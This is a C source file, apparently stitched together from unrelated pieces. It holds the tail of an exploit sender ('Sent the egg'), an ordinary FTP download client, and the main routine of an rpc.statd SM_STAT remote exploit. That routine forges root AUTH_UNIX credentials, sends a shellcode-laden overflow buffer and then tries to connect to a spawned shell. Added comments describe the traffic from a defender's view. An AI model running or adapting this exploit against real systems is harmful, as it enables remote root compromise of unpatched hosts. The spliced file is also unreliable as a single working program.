    if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1)
     {
       perror("error:");
       exit(0);
     }
    printf("Connected.\n");

  /* Send up to the NUL placed at LENGTH, then CRLF; write/send results are
   * not checked. */
#ifndef UNIX
        send(sock, (char *)&buffer, strlen((char *)&buffer), 0);
        send(sock,"\r\n",2,0);
#else
    write(sock, &buffer, strlen((char *)&buffer) );
    write(sock,"\r\n",2);
#endif
    SLEEP(1);
    printf("Sent the egg\n");
#ifndef UNIX
  WSACleanup();
#endif
    CLOSE(sock);
   exit(1);	/* exits 1 even on the successful path */
}
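/*
 * Sends the FTP command already formatted into buf and reads the server's
 * reply back into the same buffer.  `len` is the snprintf() result for that
 * command; a negative value, or one that did not fit in MAX_LENGTH, means
 * the command was truncated and -1 is returned without touching the socket,
 * so a clipped user name, path or file name is never sent.  tcp_write() and
 * tcp_read() are declared outside this block.
 */
static int ftp_exchange(int fd, char *buf, int len)
{
	if(len < 0 || (size_t)len >= MAX_LENGTH) return -1;
	tcp_write(fd, buf);
	tcp_read(fd, buf);
	return 0;
}

/*
 * Prints `prompt`, reads one line from stdin into dst and strips the line
 * terminator.  The read is bounded by a MAX_LENGTH scratch buffer, unlike an
 * unbounded scanf("%s").  Returns 0, or -1 on EOF / read error.
 * NOTE(review): assumes dst (sv.user / sv.pass) holds MAX_LENGTH bytes --
 * confirm against the definition of sv.
 */
static int prompt_line(const char *prompt, char *dst)
{
	char input[MAX_LENGTH];
	printf("%s", prompt);
	fflush(stdout);
	if(fgets(input, sizeof input, stdin) == NULL) return -1;
	input[strcspn(input, "\r\n")] = '\0';
	strcpy(dst, input);
	return 0;
}

/*
 * RCOM FTP client: resolves sv.host, logs in, changes directory, enters
 * passive mode and downloads sv.file over the data connection.
 *
 * argc/argv go to parse_args(), which fills the global `sv` (host, ip, port,
 * user, pass, path, file).  parse_args, getip, tcp_*, calculate_pasv_data,
 * retr_alarm, retr_fd, retr_buf, RETR_DELAY, MAX_LENGTH and MAX_FILE_SIZE are
 * declared outside this block.
 *
 * Returns 0 on success, 1 if a connection cannot be opened, a prompt hits EOF
 * or an FTP command does not fit in the command buffer.
 */
int main(int argc, char* argv[]){
	int fd, pasv_fd;
	char buf[MAX_LENGTH] = {0};
	char file[MAX_FILE_SIZE] = {0};
	char pasv_ip[MAX_LENGTH];
	int  pasv_port;
	int  len;

	parse_args(argc, argv);
	getip(sv.ip, sv.host);

	//Ask for account data if it wasnt used in link.
	if(strcmp(sv.user, "_undefined")==0 || strcmp(sv.pass, "_undefined")==0){
		/* These two prompts were unreadable in the source this block was
		 * restored from (masked as "******"); rebuilt as bounded reads. */
		if(prompt_line("[App] Username: ", sv.user) < 0) return 1;
		if(prompt_line("[App] Password: ", sv.pass) < 0) return 1;
		printf("\n");
	}

	printf("RCOM FTP Application Initialized\n");
	printf("-----------------------------\n");
	printf("Hostname : %s\n", sv.host);
	printf("IP Addr  : %s\n", sv.ip);
	printf("Port     : %d\n", sv.port);
	printf("Username : %s\n", sv.user);
	/* Not echoed: the original printed the password in clear, leaking it to
	 * the terminal, its scrollback and any captured stdout. */
	printf("Password : ********\n");
	printf("Path     : %s\n", sv.path);
	printf("File     : %s\n", sv.file);
	printf("-----------------------------\n");

	// FTP Application
	fd = tcp_open(sv.ip, sv.port);			// Open Connection
	if(fd < 0){
		printf("[App] Could not connect to %s:%d\n", sv.ip, sv.port);
		return 1;
	}

	tcp_read(fd, buf);						// Read 220, Server Welcome Message

	/* Commands end in CRLF as RFC 959 requires (the original sent a bare LF)
	 * and are bounded by snprintf(); ftp_exchange refuses a truncated one. */
	len = snprintf(buf, sizeof buf, "user %s\r\n", sv.user);
	if(ftp_exchange(fd, buf, len) < 0) goto too_long;

	len = snprintf(buf, sizeof buf, "pass %s\r\n", sv.pass);
	if(ftp_exchange(fd, buf, len) < 0) goto too_long;

	len = snprintf(buf, sizeof buf, "cwd .%s\r\n", sv.path);
	if(ftp_exchange(fd, buf, len) < 0) goto too_long;

	len = snprintf(buf, sizeof buf, "pasv\r\n");
	if(ftp_exchange(fd, buf, len) < 0) goto too_long;

	pasv_port = calculate_pasv_data(buf, pasv_ip);
	printf("[App] Passive Mode Data - Address: %s, Port: %d\n", pasv_ip, pasv_port);

	pasv_fd = tcp_open(pasv_ip, pasv_port);	// Open Secondary Stream and Download File
	if(pasv_fd < 0){
		printf("[App] Could not open data connection to %s:%d\n", pasv_ip, pasv_port);
		tcp_close(fd);
		return 1;
	}

	/* Presumably retr_alarm() sends retr_buf on retr_fd once the alarm fires
	 * after RETR_DELAY seconds -- confirm against retr_alarm(). */
	(void) signal(SIGALRM, retr_alarm);
	retr_fd = fd;
	len = snprintf(buf, sizeof buf, "retr %s\r\n", sv.file);
	if(len < 0 || (size_t)len >= sizeof buf){
		tcp_close(pasv_fd);
		goto too_long;
	}
	strcpy(retr_buf, buf);	/* NOTE(review): assumes retr_buf holds MAX_LENGTH bytes -- confirm */
	alarm(RETR_DELAY);

	tcp_getfile(pasv_fd, file);

	tcp_close(pasv_fd);						// Close Connections
	tcp_close(fd);

	return 0;

too_long:
	printf("[App] Command too long for %d-byte buffer\n", (int)sizeof buf);
	tcp_close(fd);
	return 1;
}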
/*
 * Client for an rpc.statd SM_STAT exploit: the mon_name field of the request
 * is the buffer built by wizardry().  Kept as-is; comments only.
 *
 * getopt options: -t talk TCP instead of UDP; -p <port> (0 lets the RPC
 * library ask the portmapper); -a 0x<bufpos> buffer address; -l <buflen>;
 * -o <offset>; -s <timeout, seconds>; -w <wipe>; -d <index into types[]>,
 * which overrides the five values above.  The positional argument is the
 * target host.  types[], shellcode, wizardry(), connection(), usage(),
 * getip() and the SM_* / xdr_sm_* RPC symbols are declared outside this
 * block.
 *
 * Defender's view: the observable artifact is an SM_STAT call to statd whose
 * mon_name is an oversized, non-hostname string, sent with AUTH_UNIX
 * credentials claiming uid/gid 0 from "localhost".
 */
int
main(int argc, char **argv)
{
    int ch;
    char *buff;			/* allocated by wizardry(), freed at the end */

    CLIENT *clnt;
    enum clnt_stat res;
    struct timeval tv, tvr;		/* call timeout / UDP retry interval */
    struct sm_name smname;
    struct sm_stat_res smres;
    struct sockaddr_in addr;

    int type = -1;			/* -d: <0 means no types[] entry selected */
    int usetcp = 0;
    int timeout = 5;
    int wipe = 9;
    int offset = 600;
    int buflen = 1024;
    char *target;
    char *sc = shellcode;		/* default payload unless -d picks one */
    u_short port = 0;
    u_long bufpos = 0;		/* required: 0 is rejected below */

    int sockp = RPC_ANYSOCK;		/* let the RPC library open the socket */

    extern char *optarg;
    extern int optind;
    extern int opterr;
    opterr = 0;			/* suppress getopt's own diagnostics */


    while((ch = getopt(argc, argv, "tp:a:l:o:w:s:d:")) != -1)
    {
        switch(ch)
        {
            case 't': usetcp = 1; break;
            case 'p': sscanf(optarg, "%hu", &port); break;
            case 'a': sscanf(optarg, "%lx", &bufpos); break;
            case 'l': buflen = atoi(optarg); break;
            case 'o': offset = atoi(optarg); break;
            case 's': timeout = atoi(optarg); break;
            case 'w': wipe = atoi(optarg); break;
            case 'd': type = atoi(optarg); break;
            default : usage(argv[0]);
        }
    }

    /* argv[optind] is NULL when no positional argument follows the options. */
    if(!(target = argv[optind]))
    {
        fprintf(stderr, "No target host specified\n");
        exit(EXIT_FAILURE);
    }

    if(type >= 0)
    {
        /* The "- 1" implies the last types[] entry is a terminator -- confirm
         * against the table definition. */
        if(type >= sizeof types / sizeof types[0] - 1)
        {
            fprintf(stderr, "Invalid type\n");
            exit(EXIT_FAILURE);
        }

        sc = types[type].code;
        bufpos = types[type].bufpos;
        buflen = types[type].buflen;
        offset = types[type].offset;
        wipe = types[type].wipe;
    }

    if(!bufpos)
    {
        fprintf(stderr, "No buffer address specified\n");
        exit(EXIT_FAILURE);
    }

    bzero(&addr, sizeof addr);
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    addr.sin_addr = getip(target);	/* this getip() returns a struct in_addr */

    tv.tv_sec = timeout;
    tv.tv_usec = 0;

    if(!usetcp)
    {
        clnt = clntudp_create(&addr, SM_PROG, SM_VERS, tv, &sockp);
        if(clnt == NULL)
        {
            clnt_pcreateerror("clntudp_create()");
            exit(EXIT_FAILURE);
        }
        /* Retransmit every 2 s within the overall call timeout. */
        tvr.tv_sec = 2;
        tvr.tv_usec = 0;
        clnt_control(clnt, CLSET_RETRY_TIMEOUT, (char *) &tvr);
    }
    else
    {
        clnt = clnttcp_create(&addr, SM_PROG, SM_VERS, &sockp, 0, 0);
        if(clnt == NULL)
        {
            clnt_pcreateerror("clnttcp_create()");
            exit(EXIT_FAILURE);
        }
    }

    /* AUTH_UNIX / AUTH_SYS authentication forgery: these credentials are
     * asserted by the client and never verified by the server, so uid 0 /
     * gid 0 on "localhost" is simply claimed. */
    clnt->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);

    buff = wizardry(sc, bufpos, buflen, offset, wipe);
    smname.mon_name = buff;

    /* Synchronous SM_STAT call with timeout tv. */
    res = clnt_call(clnt, SM_STAT, (xdrproc_t) xdr_sm_name,
        (caddr_t) &smname, (xdrproc_t) xdr_sm_stat_res,
        (caddr_t) &smres, tv);

    if(res != RPC_SUCCESS)
    {
        /* No reply is read as the hoped-for outcome; connection() is tried
         * against addr after 5 s and falls through to "Failed" otherwise. */
        clnt_perror(clnt, "clnt_call()");
        printf("A timeout was expected. Attempting connection to shell..\n");
        sleep(5); connection(addr);
        printf("Failed\n");
    }
    else
    {
        /* A well-formed reply means statd handled the request normally. */
        printf("Failed - statd returned res_stat: (%s) state: %d\n",
                smres.res_stat ? "failure" : "success", smres.state);
    }

    free(buff);
    clnt_destroy(clnt);
    return -1;		/* always a non-zero exit status */
}